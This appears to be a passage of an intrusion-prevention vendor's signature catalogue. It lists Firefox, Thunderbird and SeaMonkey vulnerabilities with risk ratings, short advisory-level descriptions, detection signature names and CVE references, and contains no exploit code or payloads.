sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Firefox ESR; Mozilla Thunderbird

Type:

Code Injection

Description:

JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. A remote attacker could exploit these vulnerabilities by enticing a user to open a maliciously crafted webpage. Successful exploitation may allow arbitrary code execution with the privileges of the user.

Situation:

File-Text_Mozilla-Firefox-Jit-Code-Allocation

References:

CVE-2017-5375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375

BID-95757
http://www.securityfocus.com/bid/95757

Mozilla-Firefox-Jit-Code-Allocation-2

About this vulnerability:

A vulnerability in Mozilla Firefox allowing bypass of ASLR and DEP protections

Risk:

High

First detected in:

sgpkg-ips-1162-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Firefox ESR; Mozilla Thunderbird

Type:

Code Injection

Description:

JIT-spray targeting asm.js combined with a heap spray allows for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. A remote attacker could exploit these vulnerabilities by enticing a user to open a maliciously crafted webpage. Successful exploitation may allow arbitrary code execution with the privileges of the user.

Situation:

File-Text_Mozilla-Firefox-Jit-Code-Allocation

References:

CVE-2017-5400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5400

BID-96654
http://www.securityfocus.com/bid/96654

Mozilla-Firefox-Jit-Compiler-Type-Confusion

About this vulnerability:

An attempt to exploit a vulnerability in Mozilla Firefox detected

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Type Confusion

Description:

An attempt to exploit a vulnerability in Mozilla Firefox detected.

Situation:

File-Text_Mozilla-Firefox-Jit-Compiler-Type-Confusion

References:

CVE-2019-17026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17026

Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Mozilla Firefox products

Risk:

Moderate

First detected in:

sgpkg-ips-161-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Firefox products. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious web site, terminating the affected application or causing arbitrary code to be executed with the privileges of the currently logged in user.

Situation:

HTTP_SS-Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption
File-TextId_Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption

References:

CVE-2007-5959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5959

BID-26593
http://www.securityfocus.com/bid/26593

OSVDB-38867
http://www.osvdb.org/38867

Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution

About this vulnerability:

Command execution vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mozilla Firefox

Type:

Code Injection

Description:

Mozilla Firefox has a command execution vulnerability in the handling of specially crafted arguments passed to certain registered URI handlers. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.

Situation:

HTTP_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-Text_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-TextId_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution

References:

CVE-2007-4041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4041

BID-25053
http://www.securityfocus.com/bid/25053

Mozilla-Firefox-Navigator-Remote-Code-Execution

About this vulnerability:

A Mozilla Firefox Navigator Remote Code Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-734-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Input Validation

Description:

A vulnerability in Mozilla Firefox, versions 1.5 before 1.5.0.5, which allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object that are accessed when Java starts up.

Situation:

File-Text_Mozilla-Firefox-Navigator-Remote-Code-Execution

References:

CVE-2006-3677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3677

BID-19192
http://www.securityfocus.com/bid/19192

OSVDB-27559
http://www.osvdb.org/27559

Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Firefox. A remote attacker can exploit this vulnerability by enticing a target user to visit a malicious web page. Successful exploitation can lead to non-privileged arbitrary code execution.

Situation:

HTTP_SS-Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption
File-Text_Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption

References:

CVE-2009-3070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3070

BID-36343
http://www.securityfocus.com/bid/36343

OSVDB-57971
http://www.osvdb.org/57971

Mozilla-Firefox-nsSVGValue-Denial-Of-Service

About this vulnerability:

A Mozilla Firefox nsSVGValue Denial Of Service vulnerability.

Risk:

High

First detected in:

sgpkg-ips-760-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Mozilla Firefox

Type:

Insecure Configuration

Description:

A vulnerability in Mozilla Firefox, versions 7 and 8 before 8.0.1, where the improper handling of the notification of nsSVGValue observers can lead to and out of bounds access, which allows remote attackers to cause a denial of service condition.

Situation:

File-Text_Mozilla-Firefox-Navigator-Remote-Code-Execution

References:

CVE-2011-3658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3658

OSVDB-77953
http://www.osvdb.org/77953

Mozilla-Firefox-nsTreeRange-Use-After-Free

About this vulnerability:

An attempt to exploit vulnerability in Mozilla Firefox Detected

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Mozilla Firefox. The vulnerability is due to a flaw in the code that handles user-defined functions of an nsTreeSelection element, which allows freeing an object and operating on it afterwards.

Situation:

HTTP_SS-Mozilla-Firefox-nsTreeRange-Use-After-Free
File-Text_Mozilla-Firefox-nsTreeRange-Use-After-Free
File-TextId_Mozilla-Firefox-nsTreeRange-Use-After-Free

References:

CVE-2011-0073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0073

BID-47663
http://www.securityfocus.com/bid/47663

OSVDB-72087
http://www.osvdb.org/72087

Mozilla-Firefox-Object-Mchannel-Use-After-Free

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-408-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Mozilla Firefox. The vulnerability is due to a specific method call on an object with an unassigned mChannel, resulting in a dangling pointer. A remote attacker could exploit this vulnerability by enticing a user to visit a malicious web page. A successful attack would result in execution of arbitrary code in the security context of the browser's user. If the attack fails, Firefox may terminate abnormally.

Situation:

HTTP_SS_Mozilla-Firefox-Object-Mchannel-Use-After-Free
File-Text_Mozilla-Firefox-Object-Mchannel-Use-After-Free

References:

CVE-2011-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0065

BID-47659
http://www.securityfocus.com/bid/47659

OSVDB-72085
http://www.osvdb.org/72085

Mozilla-Firefox-Object-Tag-Null-Dereference

About this vulnerability:

Mozilla Firefox Object Tag Null Dereference

Risk:

High

First detected in:

sgpkg-ips-669-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Browser

Description:

A vulnerability exists in Mozilla Firefox, versions before 2.0.0.5, that allows remote attackers to cause a denial of service via a crafted value in an HTML Object tag.

Situation:

File-Text_Mozilla-Firefox-Object-Tag-Null-Dereference

References:

CVE-2007-3734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3734

BID-24946
http://www.securityfocus.com/bid/24946

OSVDB-38000
http://www.osvdb.org/38000

Mozilla-Firefox-onreadystatechange-Use-After-Free

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-548-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird

Type:

Malfunction

Description:

A code execution vulnerability exists in Mozilla Firefox and Thunderbird. The vulnerability is caused by a Use-After-Free error when processing script code making use of the onreadystatechange event handler. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user. Note that this vulnerability is being actively exploited in the wild.

Situation:

File-Text_Mozilla-Firefox-onreadystatechange-Use-After-Free

References:

CVE-2013-1690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1690

BID-60778
http://www.securityfocus.com/bid/60778

OSVDB-94584
http://www.osvdb.org/94584

Mozilla-Firefox-onUnload-SSL-Certificate-Spoofing

About this vulnerability:	A vulnerability in Mozilla Firefox
Risk:	High
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Mozilla Firefox
Type:	Malfunction
Description:	There exists a vulnerability in the way products based on the Mozilla Gecko web browser engine display security settings for a web page. Using the unload event, an attacker can cause the browser load a valid certificate from a trusted web site and show the "secure padlock" icon while displaying content from a malicious web site.
Situation:	File-Text_Mozilla-Firefox-onUnload-SSL-Certificate-Spoofing

Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Mozilla Firefox. The vulnerability is due to improper user messaging when using the PKCS11 Module to load dynamic link libraries (DLLs). An attacker can exploit this vulnerability by customizing the dialog message to trick a user into loading a malicious DLL. In a successful attack where arbitrary code is injected and executed on the vulnerable target host, the behavior of the target system depends on the malicious code. Note that any code executed by the attacker runs with the privileges of the logged in user.

Situation:

HTTP_SS-Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution

References:

CVE-2009-3076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3076

BID-36343
http://www.securityfocus.com/bid/36343

Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer

About this vulnerability:

A code execution vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-326-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a code execution vulnerability in Mozilla Firefox. The vulnerability is due to a memory corruption while handling crafted <object> tags in HTML pages. By enticing a target user to visit a malicious web page, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer
File-Text_Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer

References:

CVE-2010-2755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2755

BID-41933
http://www.securityfocus.com/bid/41933

OSVDB-66786
http://www.osvdb.org/66786

Mozilla-Firefox-Prototype-Pollution-CVE-2022-1802

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-1860-5242

Last changed:

sgpkg-ips-1860-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

A prototype pollution vulnerability exists in Firefox ESR < 91.9.1, Firefox < 100.0.2, Firefox for Android < 100.3.0, and Thunderbird < 91.9.1. A successful exploit can result in the execution of arbitrary Javascript in a privileged context.

Situation:

File-Text_Mozilla-Firefox-Prototype-Pollution-CVE-2022-1802

References:

CVE-2022-1802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1802

Mozilla-Firefox-Remote-Code-Execution

About this vulnerability:

A Mozilla Firefox Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-760-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Mozilla Firefox

Type:

Insecure Configuration

Description:

A vulnerability in Mozilla Firefox, versions before 3.6.26 and 4.x through 9.0, which allows remote attackers to execute arbitrary code via access to removed nsDOMAttribute child nodes.

Situation:

File-Text_JavaScript-ShellCode-Generation

References:

CVE-2011-3659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3659

OSVDB-78736
http://www.osvdb.org/78736

Mozilla-Firefox-Resource-URL-Handling-Directory-Traversal

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-582-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Input Validation

Description:

There is a directory traversal vulnerability in Mozilla Firefox 2.0.0.4 and earlier on Mac OS X and Unix that allows a remote attacker to read arbitrary files via ..%2F sequences in a resource:// URI.

Situation:

File-Text_Mozilla-Firefox-Resource-URL-Handling-Directory-Traversal

References:

CVE-2007-3072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3072

OSVDB-35920
http://www.osvdb.org/35920

Mozilla-Firefox-Sharedworker-Messageport-Use-After-Free

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Low

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Mozilla Firefox. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Mozilla-Firefox-Sharedworker-Messageport-Use-After-Free

References:

CVE-2014-1548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1548

BID-68818
http://www.securityfocus.com/bid/68818

OSVDB-109417
http://www.osvdb.org/109417

Mozilla-Firefox-Sidebar-Panel-Arbitrary-Code-Execution

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Low

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There exists a vulnerability in Mozilla Firefox. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Mozilla-Firefox-Sidebar-Panel-Arbitrary-Code-Execution

References:

CVE-2005-0402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0402

BID-12884
http://www.securityfocus.com/bid/12884

Mozilla-Firefox-SVG-Animation-Use-After-Free-CVE-2016-9079

About this vulnerability:

A use-after-free vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-1003-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Mozilla Firefox. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Mozilla-Firefox-SVG-Animation-Use-After-Free-CVE-2016-9079

References:

CVE-2016-9079
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9079

Mozilla-Firefox-SVG-Element-Processing-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Firefox allows remote code execution

Risk:

High

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Mozilla Firefox. The flaw is due to an implemention error while handling SVG elements. A remote attacker can exploit this vulnerability by persuading a target user to open a malicious webpage. Successful attacks could allow for arbitrary code injection and execution within the security privileges of the currently logged on user. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. In the case of an unsuccessful code execution attack, Firefox may terminate abnormally.

Situation:

File-Text_Mozilla-Firefox-SVG-Element-Processing-Memory-Corruption

References:

CVE-2009-2469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2469

BID-35758
http://www.securityfocus.com/bid/35758

Mozilla-Firefox-Table-Use-After-Free-CVE-2017-5404

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mozilla Firefox

Type:

Use-after-free

Description:

A use-after-free vulnerability exists in Mozilla Firefox.

Situation:

File-Text_Mozilla-Firefox-Table-Use-After-Free-CVE-2017-5404

References:

CVE-2017-5404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5404

Mozilla-Firefox-Tag-Order-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Low

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Mozilla Firefox. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Mozilla-Firefox-Tag-Order-Memory-Corruption

References:

CVE-2006-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0749

BID-17516
http://www.securityfocus.com/bid/17516

Mozilla-Firefox-Thunderbird-SeaMonkey-IDBKeyRange-Use-After-Free

About this vulnerability:

A vulnerability in Firefox, Thunderbird and SeaMonkey

Risk:

High

First detected in:

sgpkg-ips-461-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Malfunction

Description:

A use-after-free vulnerability has been reported in Mozilla Firefox, Thunderbird, and SeaMonkey. The vulnerability is due to code accessing an IDBKeyRange object after its destruction. An attacker could exploit this vulnerability by enticing a target user to view crafted web content or by sending a target user a crafted email. Successful exploitation of this vulnerability would result in execution of arbitrary attacker code on the target system in the security context of the user running the vulnerable application.

Situation:

File-Text_Mozilla-Firefox-Thunderbird-SeaMonkey-IDBKeyRange-Use-After-Free

References:

CVE-2012-0469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0469

BID-53220
http://www.securityfocus.com/bid/53220

OSVDB-81515
http://www.osvdb.org/81515

Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Firefox web browser. The vulnerability is due to improper calculation of an object offset in a specific case of the top-level script. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation causes a memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application abnormally.

Situation:

HTTP_SS-Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption
File-Text_Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption

References:

CVE-2009-3073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3073

BID-36343
http://www.securityfocus.com/bid/36343

Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-232-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Tracemonkey component of Mozilla Firefox.

Situation:

HTTP_SS-Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption
File-Text_Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption

References:

CVE-2009-2477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2477

BID-35660
http://www.securityfocus.com/bid/35660

Mozilla-Firefox-Unicode-Data-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-233-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Buffer Overflow

Description:

There is a denial of service vulnerability in Mozilla Firefox.

Situation:

HTTP_SS-Mozilla-Firefox-Unicode-Data-Denial-Of-Service
File-Text_Mozilla-Firefox-Unicode-Data-Denial-Of-Service

References:

CVE-2009-2479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2479

BID-35707
http://www.securityfocus.com/bid/35707

OSVDB-55931
http://www.osvdb.org/55931

Mozilla-Firefox-Unicode-Sequence-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of some Unicode sequences in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Suite

Type:

Buffer Overflow

Description:

Firefox Web browser has a buffer overflow vulnerability in the handling of 'zero width joiner' and 'zero width non-joiner' Unicode characters. Remote attacker may be able to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

HTTP_Mozilla-Firefox-Unicode-Sequence-Handling-Buffer-Overflow

References:

CVE-2005-2702
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2702

BID-14918
http://www.securityfocus.com/bid/14918

Mozilla-Firefox-URI-Handling-Vulnerability

About this vulnerability:	Mozilla Firefox URI Handling Vulnerability
Risk:	Low
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Mozilla Firefox
Type:	Malfunction
Description:	A vulnerability exists in Firefox 2.0.0.5 and prior.
Situation:	File-Text_Mozilla-Firefox-URI-Handling-Vulnerability

Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Mozilla Firefox.

Situation:

HTTP_SS-Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow
File-Text_Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow

References:

CVE-2008-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0016

BID-31346
http://www.securityfocus.com/bid/31346

Mozilla-Firefox-Webassembly-Table-Integer-Underflow

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Integer Overflow

Description:

Improper script validation causes a table integer underflow vulnerability in Mozilla Firefox. A successful exploit can allow an attacker to run arbitrary code on the target system.

Situation:

File-Text_Mozilla-Firefox-Webassembly-Table-Integer-Underflow

References:

CVE-2018-5093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5093

Mozilla-Firefox-Webextensions-Settingcontent.Ms-Policy-Bypass

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox ESR

Risk:

Moderate

First detected in:

sgpkg-ips-1096-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

A design weakness in Firefox allows a malicious WebExtension to open a SettingContent-ms file without a user prompt. A successful exploit may allow the attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CS-Mozilla-Firefox-Webextensions-Settingcontent.Ms-Policy-Bypass

References:

CVE-2018-12368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12368

Mozilla-Firefox-WebGL-Integer-Overflow

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-903-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Integer Overflow

Description:

An integer overflow when processing WebGL causes a memory corruption vulnerability in Mozilla Firefox. A successful exploitation may allow a remote attacker to execute arbitrary code on the target system.

Situation:

File-Text_Mozilla-Firefox-WebGL-Integer-Overflow

References:

CVE-2017-5459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5459

Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-297-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Integer Overflow

Description:

There is a code execution vulnerability in Mozilla Firefox. The vulnerability is due to an integer overflow error in a font decompression routine within the Web Open Fonts Format (WOFF) decoder. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target machine by enticing a user to open a maliciously crafted WOFF file.

Situation:

HTTP_SS-Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow
File-Binary_Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow

References:

CVE-2010-1028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1028

BID-38298
http://www.securityfocus.com/bid/38298

Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Mozilla Foundation's family of browser products. The flaw exists in the XBL (Extensible Binding Language) component and specifically happens via dynamic manipulation of XUL Tags inside Event Handlers. A remote attacker can exploit this vulnerability to execute arbitrary code in the security context of the target browser.

Situation:

HTTP_SS-Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption
File-TextId_Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption

References:

CVE-2007-5339
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339

BID-26132
http://www.securityfocus.com/bid/26132

Mozilla-Firefox-XML-Parser-Memory-Corruption-Denial-of-Service

About this vulnerability:	Mozilla Firefox XML Parser Memory Corruption Denial of Service vulnerability.
Risk:	High
First detected in:	sgpkg-ips-669-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Mozilla Firefox
Type:	Browser
Description:	A vulnerability exists in Mozilla Firefox 3.6 that allows remote attackers to cause a denial of service via an XML document which includes a long series of start tags with no corresponding end tags.
Situation:	File-Text_Mozilla-Firefox-XML-Parser-Memory-Corruption-Denial-of-Service

Mozilla-Firefox-Xmlserializer-Use-After-Free

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-548-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

A code execution vulnerability exists in Mozilla Firefox. The vulnerability is caused by a use-after-free error when processing script code making use of the XMLSerializer function. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Mozilla-Firefox-Xmlserializer-Use-After-Free

References:

CVE-2013-0753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0753

BID-57209
http://www.securityfocus.com/bid/57209

OSVDB-89021
http://www.osvdb.org/89021

Mozilla-Firefox-Xraywrapper-Policy-Bypass

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-637-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Malfunction

Description:

A policy bypass vulnerability has been reported in Mozilla Firefox and SeaMonkey. The vulnerability is due to an issue with processing the derived trap has. A remote attacker can exploit this vulnerability by enticing a victim to open a maliciously crafted webpage. Successful exploitation could lead to chrome:// access.

Situation:

File-Text_Mozilla-Firefox-Xraywrapper-Policy-Bypass

References:

CVE-2014-8636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8636

OSVDB-117005
http://www.osvdb.org/117005

Mozilla-Firefox-XSL-Transformation-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Firefox. The flaw is due to insufficient validation while processing a malicious XSL stylesheet. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. In a successful attack that arbitrary code being injected and executed on the vulnerable target host, the behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker runs with the privileges of the logged in user. In an attack where code execution fails, the vulnerable application will terminate abnormally while parsing the malicious document.

Situation:

HTTP_CSU-Mozilla-Firefox-XSL-Transformation-Memory-Corruption

References:

CVE-2009-1169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1169

BID-34235
http://www.securityfocus.com/bid/34235

Mozilla-Firefox-XUL-menupopup.menu-Null-Pointer-Dereference-DoS

About this vulnerability:

Mozilla Firefox XUL menupopup.menu Null Pointer Dereference DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-669-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Browser

Description:

